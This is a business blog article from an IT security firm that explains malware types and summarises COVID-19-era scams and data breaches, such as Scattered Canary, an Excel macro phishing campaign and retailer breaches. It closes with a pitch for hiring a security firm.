Malware, Hacking, and Breaches: How Opportunists Are Targeting Businesses During COVID-19

Let’s get straight to the point — the current pandemic has been hard on businesses nationwide. Between adjusting to working from home, learning to market and sell exclusively online, and making sure all your employees are safe, it’s easy to let some things fall through the cracks, including cybersecurity. In this article, will take you through the ramifications of lowering your cybersecurity defenses, as well as notable instances of security breaches observed in networks of all sizes and calibers, from small businesses to the federal government, since the beginning of quarantine.

What Is Malware?

Malware is defined as any software that is designed to damage, disrupt, or infiltrate a device or network. Many types of programs fall under this umbrella, notably spyware, ransomware, traditional viruses, and worms.  


Malware is an all-encompassing term that includes many forms of intentionally malicious software (in fact, the word malware was first coined in 1990 by the late Israeli professor, Yisrael Radai, as a conjunction of the words “malicious” and “software”).

Joseph Steinberg via Inc.

Spyware is a class of programs designed, as the name implies, to spy on infected devices. Features of spywares can include keyloggers (which record every keystroke entered by a user), Internet activity monitors, and collectors for stored user logins and passwords. Some spyware can also change the settings of the infected computer, redirect browser activity to malicious websites, and download software without a user’s consent.

Ransomware is designed to lock the data on an infected device so that users can’t access their files. This locking is usually accompanied by a demand for ransom payments in cryptocurrency, hence the name ransomware. Even if a ransom is paid, it is not uncommon for files to remain locked, and for the program to swiftly spread to other devices. Many of the most famous malwares to this date are ransomware, including Petya and WannaCry.

This ASCII art appeared on the screens of computers infected with certain variants of the Petya ransomware. The most recent severe Petya release happened in 2017.

Traditional viruses write themselves into programs already present on a computer, referred to as “hosts”, thereby infecting it and giving the virus an opportunity to spread. Once inside, a virus can modify other software on the computer, allowing it to corrupt data, steal personal information, spam, and display threatening messages on the screen, just to name a few things. They can also substantially slow down infected machines, negatively impacting your workflow.  

Worms are standalone chunks of code that can self-replicate without a host program, allowing them to spread through networks incredibly quickly. They can be passed along through all manner of Internet activity, including infected websites, emails, shared files, and even your own servers if they’re not properly protected. Worms often carry a different piece of malware or malevolent script as a “payload,” allowing it to spread faster using the worm’s capabilities, but can be destructive on their own by causing a traffic overload. There are other types of malware as well, including adware, malvertising, Trojan horses, and hybrids of more than one category. Low cybersecurity standards can leave your business open to any of these, endangering your data. Let’s delve into notable uses of these malwares since the beginning of the pandemic, to see how they affect real-world businesses.

Scattered Canary Scam

The CARES Act, put in place in response to the pandemic, includes multiple types of payouts. There are the $1,200 stimulus checks that most Americans received, but there are also unemployment wages and the extra $600/wk being given to those laid off. As soon as the act was instated, the U.S. government was hit with a titanic wave of claims, which they are still working through. Mixed in with these legitimate claims, however, were thousands of false ones from Nigerian scam ring Scattered Canary. They made off with a sum estimated to be multiple millions of dollars before being detected. How did they do it?

Well, long before the pandemic began, Scattered Canary was operating a “business email compromise” ring, using phishing and email-spread malware to obtain the identities and login credentials of innumerable businessmen and women. When combined with the data stolen in unrelated breaches of bank data, the ring had more than enough personal information available to create fraudulent claims with. The state of Washington was hit the hardest by the wave of claims, even though it had just been given a $44M cybersecurity upgrade. It is unknown exactly how many were filed, but losses are estimated to be in the millions of dollars. Washington missed multiple red flags in the transactions, including payments to out-of-state banks and use of suspicious email accounts, which the new security software was meant to scan for. All in all, the Scattered Canary fraud wave represents an utter failure in government cybersecurity, which was unfortunately exploited to the detriment of U.S. citizens.

…The biggest victims [of the fraud wave] may be the innumerable Washingtonians who now have had their legitimate and urgently needed claims for jobless benefits delayed as the state tries belatedly to halt the fraud. Others who have already received money say their claims are being investigated for “possible overpayment.”

Jim Brunner et al. via Seattle Times

MS Excel Phishing

On May 18, Microsoft Security Intelligence used Twitter to warn customers of a new phishing scam executed through Microsoft Excel. The scheme began with the sending of fraudulent emails, claiming to be from the Johns Hopkins Center on the topic of COVID-19. Each email contained an Excel attachment, presented as a graph of coronavirus cases in the U.S. When the attachment was opened, it would ask the user to enable macros, and then use the resultant security permissions to install a Remote Access Terminal (RAT) from NetSupport Manager, a legitimate remote management tool. This program allows remote access into the computer, enabling the perpetrators to take control, and view and steal data.

Microsoft reports that hundreds of unique macro programs were found in the emails it analyzed, each obfuscated as much as possible by the formatting of the macro itself, so as to make it look more legitimate. However, when analyzed more closely, every macro led back to the same URL, which would then install the RAT. The script installed also had the capability to connect to certain servers and potentially access Windows PowerShell, allowing it to detrimentally alter the infected computers and associated networks. 

Data Breaches Galore

Data breaches are more common than one might think, even among major corporations. Since the beginning of the year, there have been innumerable breaches of customer data among online shops and services. For example, in April, a research team named Cyble discovered half a million Zoom account logins, which had been illegitimately taken in a data breach, for sale on the dark web. Not more than a week later, the same team found the identities of 267 million Facebook users listed on the dark web, for the measly sum of $540. The Facebook data seems to be from a prior breach, and did not include passwords, but it did include full names, Facebook IDs, dates of birth, and more. Most worryingly, Carnival Corp. disclosed a breach of customer data including full names, SSNs, passport numbers, government ID numbers, and credit card details in March of this year.

A sample of the Facebook data found for sale, blurred by for privacy. (Cyble via Forbes)

Even before quarantine began, retail websites and storefronts have fallen victim to hacking multiple times this year. In January, Hanna Andersson, a popular childrens’ clothing brand, fell victim to a data breach including the card numbers, CVVs, expiration dates, and personal information of an unknown number of online customers. Near-simultaneously, 63 restaurants belonging to Landry’s Inc., potentially including locations of Bubba Gump Shrimp Co. and Rainforest Café among others, experienced a hack in their point-of-sale systems, which incurred a breach of some customer payment data. Fortunately for Landry’s, most of their data was protected by end-to-end encryption, so the breach was much less severe than it easily could have been. 

Most of these attacks were carried out through “credential stuffing,” a process where hackers take data that has been released in a prior breach and try using it to log into other websites. This does not fall under the category of malware, but it is a common method for bad actors to instigate data breaches. Credential stuffing cases can be hard to detect, but a good cybersecurity system can track the orders that result in fraud and blacklist their IP addresses in order to prevent them from recurring. If all corporations had tight cybersecurity, the breaches that credential stuffing relies on would also decline.

Companies… are increasingly attempting to detect and block credential stuffing attempts. And some like Google (which also owns Nest) have started initiatives to proactively check whether users’ account credentials have been compromised in breaches and trigger password resets if they discover a match. But the trick is to do all of this without blocking or hindering legitimate activity.

Lily Hay Newman via Wired


Malware is a scary thing, and can be extremely detrimental to the functioning of your business. Hackers and scammers will never quit trying to make a quick buck, or cause damage for damage’s sake, by creating malware and instigating data breaches. However, good cybersecurity practices can go a long way in preventing attacks on your computers and network. If your business is not adequately protected, looking into hiring an IT and security firm to handle your cybersecurity may be the solution for you.

Madeleine Avni

Madeleine Avni

Intern at

Madeleine Avni is a student at Rensselaer Polytechnic Institute, with over four years of experience in programming and cybersecurity. She is an intern at an employee-owned and operated, IT Consulting, Managed Services, and Information Security company based out of Long Island, NY.

For more information please reach out:
(516) 500-7789
[email protected]

Top Tech Tips for Working from Anywhere

Top Tech Tips for Working from Anywhere

I’m Shreena Bindra, one of the co.Founders and the Chief Operating Office at chief operations officer at And I’m here with Michael Maser, one of the co.Founders and the Chief Technology Office at We are going to review the top tech tips we’ve put together for working from anywhere.

read more
We Are All Aware of Hackers During COVID-19 – Now How Do We Prevent Them?

We Are All Aware of Hackers During COVID-19 – Now How Do We Prevent Them?

Hackers are everywhere. They look just like you and me; you might see them in a grocery store, online at the pharmacy, or sitting at the table next to you at a restaurant, but you would have no idea of the capabilities they possess. By definition, a hacker is a person who illegally gains access to and sometimes tampers with information in a computer system. This means they have the talent to install viruses and malware that can allow them access to your personal information and the unauthorized use of your computer.

read more

Send us a message